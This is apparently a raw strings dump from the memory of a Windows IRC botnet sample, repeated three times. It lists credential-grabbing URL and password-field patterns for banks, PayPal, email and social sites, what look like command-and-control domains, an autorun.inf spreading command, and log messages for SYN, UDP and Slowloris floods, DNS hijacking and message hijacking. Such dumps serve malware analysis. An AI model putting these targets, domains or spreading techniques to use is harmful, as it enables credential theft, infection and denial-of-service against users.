%Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\System32\dwm.exeOc:\%original file name%.exetaskhost.exe_1940_rwx_00580000_0004E000:.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0YFv.TBv%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dPTF://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhXXp://%s/%shXXp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)hXXp://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Runicon=shell32.dll,7shellexecute=%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %Ã%%%s/c "start %Ã%%.Trashes\%s.Trashes\\.\%c:%s\%s%sautorun.tmp%sautorun.inf%0x.scr*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dlla.baerr000.rua.joerv06.coma.tsroxybaa.comfbi.gov]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhXXp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\312a36d2C:\Windows\system32\taskhost.exeC:\WindowsC:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\System32\taskhost.exe[c:\%original file name%.exeExplorer.EXE_2024_rwx_04500000_0004E000:.text`.rdata@.data.reloc=MSG t>MSG u`=PASS8httpu18httpuMtlSSSSSSSSSShL0QFv.TBv%s.%s%s.%S%s.Blocked "%s" from removing our bot file!%s.Blocked "%S" from removing our bot file!i.root-servers.org%s.Blocked "%s" from moving our bot file%s.Blocked "%S" from moving our bot file%s.p10-> Message hijacked!%s.p10-> Message to %s hijacked!%s.p21-> Message hijacked!msnmsgCAL %d %6sngr->blocksize: %dblock_size: %d\\.\pipe\%skernel32.dll%s_%d-%sMutexntdll.dll%s-pid%s-commJOIN #PRIVMSG #%s.Blocked "%S" from creating "%S"%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!%s.Detected process "%S" sending an IRC packet to server %s:%d.%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).PRIVMSG %5sJOIN %5sPRIVMSGJOIN%s:%d%s.%s%s%S%s%s%s.%S%S%S%S%Sstate_%s%s.%s (p='%S')pop3://%s:%s@%s:%d%s:%s@%s:%dPTF://%s:%s@%s:%dftpgrab%s.%s ->> %s (%s : %s)%s.%s ->> %s : %s%s-%s-%s%s.Blocked possible browser exploit pack call on URL '%s'%s.Blocked possible browser exploit pack call on URL '%S'webroot.virusbuster.nprotect.heck.tconecare.live.login[password]login[username]*members*.iknowthatgirl*/members**youporn.*/login**members.brazzers.com**bcointernacional*login**:2222/CMD_LOGIN**whcms*dologin**:2086/login**:2083/login**:2082/login**webnames.ru/*user_login*Webnames*dotster.com/*login*loginid*enom.com/login*login.Passlogin.User*login.Pass=**1and1.com/xml/config**moniker.com/*Login*LoginPasswordLoginUserName*LoginPassword=**namecheap.com/*login*loginname*godaddy.com/login*Password*Password=**alertpay.com/login**netflix.com/*ogin**thepiratebay.org/login**torrentleech.org/*login**vip-file.com/*/signin-do**sms4file.com/*/signin-do**letitbit.net**what.cd/login**oron.com/login**filesonic.com/*login**speedyshare.com/login**uploaded.to/*login**uploading.com/*login*loginUserPasswordloginUserName*loginUserPassword=**fileserv.com/login**hotfile.com/login**4shared.com/login*txtpass*txtpass=**netload.in/index**freakshare.com/login*login_pass*login_pass=**mediafire.com/*login**sendspace.com/login**megaupload.*/*login**depositfiles.*/*/login**signin.ebay*SignIn*officebanking.cl/*login.asp**secure.logmein.*/*logincheck*session[password]*password]=**twitter.com/sessionstxtPassword*&txtPassword=**.moneybookers.*/*login.pl*runescape*/*weblogin**&password=**no-ip*/login**steampowered*/login*quick_password*hackforums.*/member.php*facebook.*/login.php**login.yahoo.*/*login*passwdlogin*passwd=**login.live.*/*post.srf*TextfieldPassword*TextfieldPassword=**gmx.*/*FormLogin**Passwd=*FLN-Password*FLN-Password=**pass=**bigstring.*/*index.php**screenname.aol.*/login.psp*passwordloginId*password=**aol.*/*login.psp*Passwd*google.*/*ServiceLoginAuth*login_passwordlogin_email*login_password=**paypal.*/webscr?cmd=_login-submit*%s / ?%d HTTP/1.1Host: %sUser-Agent: %sMozilla/4.0\\.\PHYSICALDRIVE0shell32.dllhttpidnsapi.dllhXXp://%s/%shXXp://%s/POST /23s[%s{%s%s{%sn%s[%s{%s%s{%s%s[%s{%s[DNS]: Redirecting "%s" to "%s"%s|%s[Logins]: Cleared %d loginsFTP ->[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)hXXp://[Login]: %s[DNS]: Blocked %d domain(s) - Redirected %d domain(s)[Speed]: Estimated upload speed %d KB/sSoftware\Microsoft\Windows\CurrentVersion\Runicon=shell32.dll,7shellexecute=%windir%\system32\cmd.exe&&%%windir%%\explorer.exe %Ã%%%s/c "start %Ã%%.Trashes\%s.Trashes\\.\%c:%s\%s%sautorun.tmp%sautorun.inf%0x.scr*bebo.*/c/profile/comment_post.json*bebo.*/mail/MailCompose.jsp**friendster.*/sendmessage.php**friendster.*/rpc.php*vkontakte.ru/mail.php*vkontakte.ru/wall.php*vkontakte.ru/api.php*facebook.*/ajax/*MessageComposerEndpoint.php*msg_text*facebook.*/ajax/chat/send.php*-_.!~*'()%s.%s hijacked!MSG %d %s %dMSG %d %1sSDG %d %dContent-Length: %dSDG %d%s_0xXRegCreateKeyExWRegCreateKeyExAURLDownloadToFileWURLDownloadToFileAHttpSendRequestWHttpSendRequestANtEnumerateValueKeyDNSAPI.dllSecur32.dllShellExecuteASHELL32.dllHttpQueryInfoAInternetOpenUrlAHttpQueryInfoWWININET.dllSHLWAPI.dllWS2_32.dllMSVCRT.dllGetProcessHeapConnectNamedPipeCreateNamedPipeADisconnectNamedPipeGetWindowsDirectoryWGetWindowsDirectoryAKERNEL32.dllUSER32.dllRegCloseKeyRegNotifyChangeKeyValueRegOpenKeyExAADVAPI32.dllole32.dlla.baerr000.rua.joerv06.coma.tsroxybaa.comfbi.gov]1.1.0.0msn.setmsn.inthttp.sethttp.inthttp.injloginsPASS %s[.ShellClassInfo]CLSID={645FF040-5081-101B-9F08-00AA002F954E}SSRR %s 0 0 :%sKCIK %sSEND %s %sPART %sPPPPMSG %s :%sQUIT :%sPPNG %sPPPPMSG[v="%s" c="%s" h="%s" p="%S"][d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d[Slowloris]: Starting flood on "%s" for %d minute(s)[Slowloris]: Finished flood on "%s"[UDP]: Starting flood on "%s:%d" for %d second(s)[UDP]: Finished flood on "%s:%d"[SYN]: Starting flood on "%s:%d" for %d second(s)[SYN]: Finished flood on "%s:%d"[USB]: Infected %s[MSN]: Updated MSN spread message to "%s"[MSN]: Updated MSN spread interval to "%s"[HTTP]: Updated HTTP spread message to "%s"[HTTP]: Injected value is now %s.[HTTP]: Updated HTTP spread interval to "%s"[Visit]: Visited "%s"[DNS]: Blocked "%s"[usb="%d" msn="%d" http="%d" total="%d"][ftp="%d" pop="%d" http="%d" total="%d"][RSOCK4]: Started rsock4 on "%s:%d"[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)[d="%s"] Error downloading file [e="%d"][d="%s"] Error writing download to "%S" [e="%d"][d="%s" s="%d bytes"] Error creating process "%S" [e="%d"][d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"][d="%s"] Error getting temporary filename. [e="%d"][d='%s"] Error getting application data path [e="%d"][Visit]: Error visitng "%s"[FTP Login]: %s[POP3 Login]: %s[FTP Infect]: %s was iframed[HTTP Login]: %s[HTTP Traffic]: %s[Ruskill]: Detected File: "%s"[Ruskill]: Detected DNS: "%s"[Ruskill]: Detected Reg: "%s"[PDef ]: %s[DNS]: Blocked DNS "%s"[MSN]: %s[HTTP]: %sftplogftpinfecthttploginhttptraffhttpspreadhXXp://api.wipmania.com/\\.\pipe\x_ipc\\.\pipe\312a36d2C:\Windows\Explorer.EXEC:\WindowsC:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Hplqlx.exe7 7678*808;8~8%s\Microsoft\%s.exe\\.\pipeInternet Explorer\iexplore.exeautorun.infpidgin.exewlcomm.exemsnmsgr.exemsmsgs.exeflock.exeopera.exechrome.exeieuser.exeiexplore.exefirefox.exe.ipconfig.exeverclsid.exeregedit.exerundll32.execmd.exeregsvr32.exel"%s" %Slol.exen127.0.0.1%s:Zone.Identifierwininet.dllsecur32.dllws2_32.dll:%S%S\Desktop.iniwinlogon.exemspaint.exeAadvapi32.dllurlmon.dllnspr4.dllAkernel23.dlly%s\%s.exelsass.exeSoftware\Microsoft\Windows\CurrentVersion\Policies\System.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\Device\HarddiskVolume1\Windows\explorer.exe8C:\Windows\Explorer.EXEc:\%original file name%.exe1E>